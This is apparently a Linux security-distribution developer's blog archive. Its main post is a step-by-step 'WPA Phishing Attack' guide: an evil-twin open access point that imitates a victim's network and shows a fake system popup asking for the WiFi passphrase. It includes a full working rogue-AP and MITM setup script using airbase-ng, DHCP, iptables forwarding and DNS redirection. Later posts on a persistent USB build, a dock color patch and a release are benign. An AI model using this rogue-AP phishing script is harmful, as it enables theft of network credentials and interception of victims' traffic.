Category Archives: WeakNet Linux

Loading
loading..

It’s hard to keep up with every project I start since I am a one man band as of late. I do admit that I love the RF hacking projects the most! One of them, the WPA Phishing Attack, was a simple way to phish a WPA/WPA2/WPA2 Enterprise password without the use of FreeRADIUS-WPE. It simply creates a fake AP that a user can connect to outside of the physical area in which the victim AP is located. Then, it forwards all traffic through the attacker machine and when a web browser is opened by the victim, he or she will be resented with a fake Windows/OSX pop up window that “requires” a WiFi pass-phrase again.

For instance, say a Victim is using “WorkAP” and heads over to another building where the WorkAP or mesh does not reach. Next, the attacker starts the evil twin AP called “WorkAP” without any encryption enabled and awaits clients. (You MUST wai for clients before running the ./MiTM.sh file or Ettercap will kill the window) Usually what happens when someone sees an AP of the same name they just click connect. Once connected they are presented with a password input for the WiFi network once the browser opens. Here is a video presentation I made back in 2010 and published on YouTube in Feb of 2011:

This new tutorial below is another one provided by The Musket Team and was posted in the comments section of my original WPA Phishing Attack Presentation weblog post. I have edited it slightly and styled. Thank you Musket Team!

The WPA Phishing program in both WeakNet Linux 3.6 and 4.2 have several bugs.
For example In the WeaknetAP.sh file the:
firefox http://127.0.0.1/wpa-credcheck.php &
points to a file in the /var/www folder that does not exist. And there are others.

The Musket Team has gotten the program to run in both WeakNet Linux Versions. Here is a step by step method.
The program requires a dhcp-server file place in the /etc/init.d/ folder
Write the following with a text editor and name it dhcp-server Make sure in the properties-permissions you check to allow executing the file as a program.

#############start of dhcp-server file#########
###location= /etc/init.d/ #################
#!/bin/sh
#
#
#
### BEGIN INIT INFO
# Provides: dhcp-server
# Required-Start: $remote_fs $network $syslog
# Required-Stop: $remote_fs $network $syslog
# Should-Start: $local_fs slapd $named
# Should-Stop: $local_fs slapd
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: DHCP server
# Description: Dynamic Host Configuration Protocol Server
### END INIT INFO

PATH=/sbin:/bin:/usr/sbin:/usr/bin

test -f /usr/sbin/dhcpd || exit 0

# It is not safe to start if we don’t have a default configuration…
if [ ! -f /etc/default/dhcp-server ]; then
echo “/etc/default/dhcp-server does not exist! – Aborting…”
echo “Run ‘dpkg-reconfigure dhcp-server’ to fix the problem.”
exit 0
fi

. /lib/lsb/init-functions

# Read init script configuration (so far only interfaces the daemon
# should listen on.)
[ -f /etc/default/dhcp-server ] && . /etc/default/dhcp-server

NAME=dhcpd
DESC=”DHCP server”
DHCPDPID=/var/run/dhcpd.pid

test_config()
{
if ! /usr/sbin/dhcpd -t -q > /dev/null 2>&1; then
echo “dhcpd self-test failed. Please fix the config file.”
echo “The error was: ”
/usr/sbin/dhcpd -t
exit 1
fi
}

# single arg is -v for messages, -q for none
check_status()
{
if [ ! -r "$DHCPDPID" ]; then
test “$1″ != -v || echo “$NAME is not running.”
return 3
fi
if read pid /dev/null 2>&1; then
test “$1″ != -v || echo “$NAME is running.”
return 0
else
test “$1″ != -v || echo “$NAME is not running but $DHCPDPID exists.”
return 1
fi
}

case “$1″ in
start)
test_config
log_daemon_msg “Starting $DESC” “$NAME”
start-stop-daemon –start –quiet –pidfile $DHCPDPID \
–exec /usr/sbin/dhcpd — -q $INTERFACES
sleep 2

if check_status -q; then
log_end_msg 0
else
log_failure_msg “check syslog for diagnostics.”
log_end_msg 1
exit 1
fi
;;
stop)
log_daemon_msg “Stopping $DESC” “$NAME”
start-stop-daemon –stop –quiet –pidfile $DHCPDPID
log_end_msg $?
rm -f “$DHCPDPID”
;;
restart | force-reload)
test_config
$0 stop
sleep 2
$0 start
if [ "$?" != "0" ]; then
exit 1
fi
;;
status)
echo -n “Status of $DESC: ”
check_status -v
exit “$?”
;;
*)
echo “Usage: $0 {start|stop|restart|force-reload|status}”
exit 1
esac

exit 0
#############end of dhcp-server file ############

The WeaknetAP.sh file has other bugs. Here is a complete rewrite for you to test. Write the following with a text editor, name the file WeakNetAP.sh then copy to /pwnt/WiFu/airbase-ng/. Again make sure in the properties-permissions you check to allow executing the file as a program.

#################start of WeakNetAP.sh ################
# location= /pwnt/WiFu/airbase-ng/
#!/bin/bash
# WeakAP startup script: (c) 2010 GNU License.
#
# Written by Trevelyn
# Douglas[at]WeakNetLabs[dot]com
# for WeakNet Linux 4.2i
#
# This creates a Rogue AP from your device,
# Starts DHCP Server in the range 192.168.0.0,
# Forwards all traffic caught to your internet connection
# and starts capturing packets, creating a PCAP file.
# –> Creating a highly advanced MITM attack.
#
# This script was meant to an “out of the box” attack
# setup for WeakNet linux Version 4.2i users.
#
# This application comes without warranty, I am not responsible
# For any damages caused by using this script.
#
# Please refer to the GNU license included in the Tarball.
#
# Start the web server now:
/etc/init.d/lighttpd start
# open firefox to the credentials checker:
firefox http://127.0.0.1/wpa.php &
#
devchk=`iwconfig 2>/dev/null | grep Monitor`;
# clean up services before starting…
/etc/init.d/dhcp3-server stop
killall -9 dhclient
killall -9 dhclient3
killall -9 dnsspoof
killall -9 ettercap
# begin:
echo “<<>>”
if [ "$devchk" != "" ]; then
echo “[ + ] Good you have a Monitor enabled WiFu Device :-)”
else
echo “[ X ] You have no Monitor mode enabled device!”
echo “[ X ] Let’s create one…”
devmk=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk ‘{print $1}’`
ifconfig $devmk up && iwconfig $devmk channel 11
echo “[ + ] Creating device from $devmk”
if [ "$devmk" = "ath0" ]; then
airmon-ng stop ath0;
airmon-ng start wifi0;
else
airmon-ng start $devmk 2>/dev/null
fi

DEV=`iwconfig 2>/dev/null | grep -m 1 IEEE | awk ‘{print $1}’`
iwconfig $DEV channel 11
iwconfig $DEV channel 11
iwconfig $DEV channel 11
if [ "$DEV" != "" ]; then
echo “[ ! ] Done, our new device is $DEV”
else
echo “[ X ] Something went really wrong! :-(”
echo “[ X ] Please Check your settings and try again.”
fi
fi
DEV=`iwconfig 2>/dev/null | grep Monitor | awk ‘{print $1}’`
echo “Shall we use $DEV as our Monitor device? (y/n)”
read foo;

if [ $foo = "n" ]
then echo “Which monitor enabled device shall I use?”
read DEV
fi

echo “What would you like to name the AP? (ESSID)”
read ESSID
echo “What would you like to name the AP? (CHANNEL)”
read CHANNEL
echo “[ + ] Starting soft AP in new Eterm window, for debugging with $DEV”
echo “[ > ] And ESSID: $ESSID”
echo “[ > ] And CHANNEL: $CHANNEL”
Eterm -e sh -c “airbase-ng -c $CHANNEL -C 30 –essid $ESSID -v $DEV; bash” &
sleep 2;
echo “[ + ] adding route for packet forwarding…”
ifconfig at0 up 192.168.0.1
ifconfig at0 netmask 255.255.255.0
ff=`ifconfig | grep “at0″ | awk ‘{print $1}’`
if [ "$ff" = "at0" ]
then echo “[ + ] at0 is on and up”
else echo “[ X ] at0 is not up, something went wrong”
fi
echo “[ + ] at0 device is now in IP range: 192.168.0.1~254…”
route add -net 192.168.0.0 netmask 255.255.255.0 gw 192.168.0.1
echo “[ + ] cleaning out iptables settings…”
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
echo “[ + ] changing iptables to forward packets…”
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o at0 -j MASQUERADE
echo “[ + ] changing ‘/proc/sys/net/ipv4/ip_forward’ to allow forwarding…”
echo 1 > /proc/sys/net/ipv4/ip_forward
echo “[ + ] Adding new rules to iptables to forward packets from at0 to wlan0″
echo “[ > ] Make sure you have an IP with wlan0!”
iptables -t nat -A PREROUTING -p udp –dport 53 -j DNAT –to 10.10.0.1
iptables –table nat –append POSTROUTING –out-interface wlan0 -j MASQUERADE
iptables –append FORWARD –in-interface at0 -j ACCEPT
echo “[ + ] Backing up DHCP3 configuration file to /etc/dhcp3/dhcpd.conf.backup…”
cp /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.backup
echo “[ + ] Dumping contents from /pwnt/WiFu/airbase-ng/dhcpd3-server.conf into /etc/dhcp3/ file…”
cat dhcpd3-server.conf > /etc/dhcp3/dhcpd.conf
ifconfig at0 up 192.168.0.1 netmask 255.255.255.0
/etc/init.d/lighttpd start
echo “[ + ] Starting DHCP server with configuration from /etc/dhcp3/dhcpd.conf”
/etc/init.d/isc-dhcp-server start
echo “[ ! ] All done with script, hope all is up and running! :-)”
echo “[ ? ] Would you like to start a MITM attack against all requests?”
echo “[ ! ] Wait until you see an association in the airbase-ng window before running.”
echo “[ ! ] If it fails, simply run ./MITM.sh again until it starts.”
echo “[ ? ] This is perfect for faking RADIUS authentication.”
echo “[ ? ] (y/n)?”
read ans
if [ "$ans" = "y" ]
then ./MITM.sh &
else
echo “Okay Then!”
fi
#################end of WeakNetAP.sh ################

Other considerations. We suggest you start your wifi adapter in monitor mode before you run the program. At start you might get error messages as the program tries to kill nonexistant programs

You must download WPA phishing files from WeakNet Labs then place them in the /var/www/ folder. Make sure you allow read-write to these files and Again make sure in the properties-permissions you check to allow executing these files as a program. If firefox gives you the wrong files etc point it to 127.0.0.1 and/or make sure the permissions are correct then shut down restart and go phishing again.

You can keep the original WeakNetAP.sh just rename to WeakNetAP.sh.orig

This post is directly from the comments section of the original non-persistent post for USB installations. All credit for this post goes to their team and John for all of their hard work :)

Musket Team Alpha has finally managed to make a Weakerth4n 8 gig persistent flash drive. They re-did the procedure on a 16 gig and 32 gig. All worked flawlessly. We have yet to update and/or upgrade.

Here is how they did it:

Using XP and unetbootin-windows-583(see pics above in this blog) we selected in the drop down distribution menus:

Debian and Stable_HdMedia

In the Diskimage we browsed to the position of the file:

WT.BG.v1.9.ISO

Ignore entry for the space used to preserve files across reboots(Ubuntu only);
Select the correct usb drive click OK and let unetbootin do its work.
The program will hang at 10 of 14 files for a while and then complete the install.
After unetbootin completed the install, boot the program from the USB to check to see that the program functions in live mode then shut down.
The flash drive was initially formated in Fat32. You need to add a ext4 partition
Start a linux based distribution that has gparted installed(NOT the usb flashdrive you just produced as it is locked during the partitioning process).

We used Backtrack5R3(BT5R3) and installed gparted to it. After BT5R3 is up and running insert the usb flash drive and run gparted from the terminal window with the command:

gparted /dev/sdb

Partition the flash drive as follows:
Make a second primary parition approximately 3.5 gig by first resizing(shrinking) the Fat32 partition and then making a second ext4 primary partition labeled live-rw from the unallocated space.

IMPORTANT

  • Use ext4 format
  • make a primary partition
  • label the ext4 partition live-rw

We ended up with:
Partition File System Label Size

  • /dev/sdb1 fat32 3.62 GiB
  • /dev/sdb2 ext4 live-rw 3.87 Gib

Now go to the fat32 partition on the flash drive.
Open the syslinux.cfg with a text editor.
Add the following command block:

label persistent usb
menu label persistent usb
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash persistent

The new complete syslinux.cfg looks like this:
==================

default menu.c32
prompt 0
menu title UNetbootin
timeout 100

label persistent usb
menu label persistent usb
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash persistent

label unetbootindefault
menu label Default
kernel /ubnkern
append initrd=/ubninit boot=live config quiet splash
label ubnentry0
menu label Live
kernel /live/vmlinuz
append initrd=/live/initrd.img boot=live config quiet splash

label ubnentry1
menu label Live (failsafe)
kernel /live/vmlinuz
append initrd=/live/initrd.img boot=live config noapic noapm nodma nomce nolapic nomodeset radeon.modeset=0 nouveau.modeset=0 nosmp vga=normal

label ubnentry2
menu label hd – boot the first hard disk
kernel /ubnkern
append initrd=/ubninit -

=====================

You do not have to rewrite the syslinux.cfg. You can run the program and when the unetbootin menu appears hit the TAB key and you will see:
append initrd=/ubninit boot=live config quiet splash

Just click the space bar and type the word persistent and enter. HOWEVER we prefer changing the syslinux.cfg as it saves us from having to remember exactly what word to type.
To test for persistence make a text file and save it to root or home, shut the program down, remove the usb, reinsert and restart. The text file should still be there.

We hope this repays the developer of this software in some small way.
MTA (a group of hackers and remote viewers)

https://code.google.com/p/entify-pm

I created Entify to have the latest and greatest of not only my applications, but other’s too. including mostly all bleeding edge WiFi hacking and administration applications specifically compiled to take full advantage of all resources.

Entify will use my web-server as a repository for the source code tarballs.

I will be releasing an ALPHA copy to the Google Code page sometime this week or weekend. stay tuned!

~Douglas

wbar is an amazing light-weight dock application that I have been using with FluxBox for years. Recently, with the release of WEAKERTH4N: BLUE GHOST, I made my own icon theme and set for the distro which clashed with the white letters used in the text of wbar making it unreadable:

So I decided to download the latest version of wbar and take a looksy at the sauce. To compile this code you will need the following dependencies:

libglade2-dev
libimlib2-dev
intltool

Which you can install on Debian systems with aptitude – no problem.

I use grep when troubleshooting or reverse engineering code – it’s my first go-to for analyzing other’s code. I grepped recursively for the word color and found the lines:

/* draw text */
imlib_context_set_color(0, 0, 0, 255);
imlib_text_draw(tw+1, th+1, cur_ic->text.c_str());
imlib_context_set_color(255, 255, 255, 255);

In the file ./src/core/SuperBar.cc This function [imlib_context_set_color] looks familiar and the values are R,G,B,A for red-green-blue-and transparency respectively. Also I knew that the color white is all colors combined and usually has the highest values: (HEX) #ffffff or in our case or 256 bit (RGB) (0-255), 255-255-255. Black is the lowest: (HEX) #000000 or 0,0,0 in 256 bit RGB. Then I looked up the RGB set for the color yellow to match my theme and found that it was 255,255,0 and HEX #ffff00. I changed the bottom function (since they are just layers – i figured the bottom layer was for the shadow) and ran:

make clean && make uninstall && make && make install

It worked! The first function [imlib_context_set_color] makes the color of the drop shadow, which is black. So then I decided to make the line unique by removing the spaces between the commas and integers like so:

imlib_context_set_color(255,255,255,255);

which obviously didn’t break the function and then wrote a simple sed script to change the color on the fly -pre-compilation:

#!/bin/bash
sed -i -r -e "s/(imlib_context_set_color\()[0-9]+,[0-9]+,[0-9]+,[0-9]+\)/\1$1,$2,$3,$4\)/" src/core/SuperBar.cc

Now we can just look up the color code in a chart like this one: http://www.tayloredmktg.com/rgb/ and pass the values ot the script like so:

./colorchange.sh 255 255 0 255

The lower the last number, the more transparent the text color will be, but make sure you match it with the shadow!

~Douglas

The last release was broken due to the Linux 3.8.X kernel not playing well with unionfs – which is pretty lame. Also there was an awful Java fonts bug that ruined dpkg. I was able to fix both and rolled the kernel back to 3.7.10 which has been tested on USB and working properly with Unetbootin. The newer kernel makes the ISO smaller. So, I present to you, version 1.9!

Download from HaxRadio:

http://hr.weaknetlabs.com

FreeRADIUS-WPE with WEAKERTH4N Instructional Video: Easy! :D

~Douglas

Layout mode
Predefined Skins
Custom Colors
Choose your skin color
Patterns Background
Images Background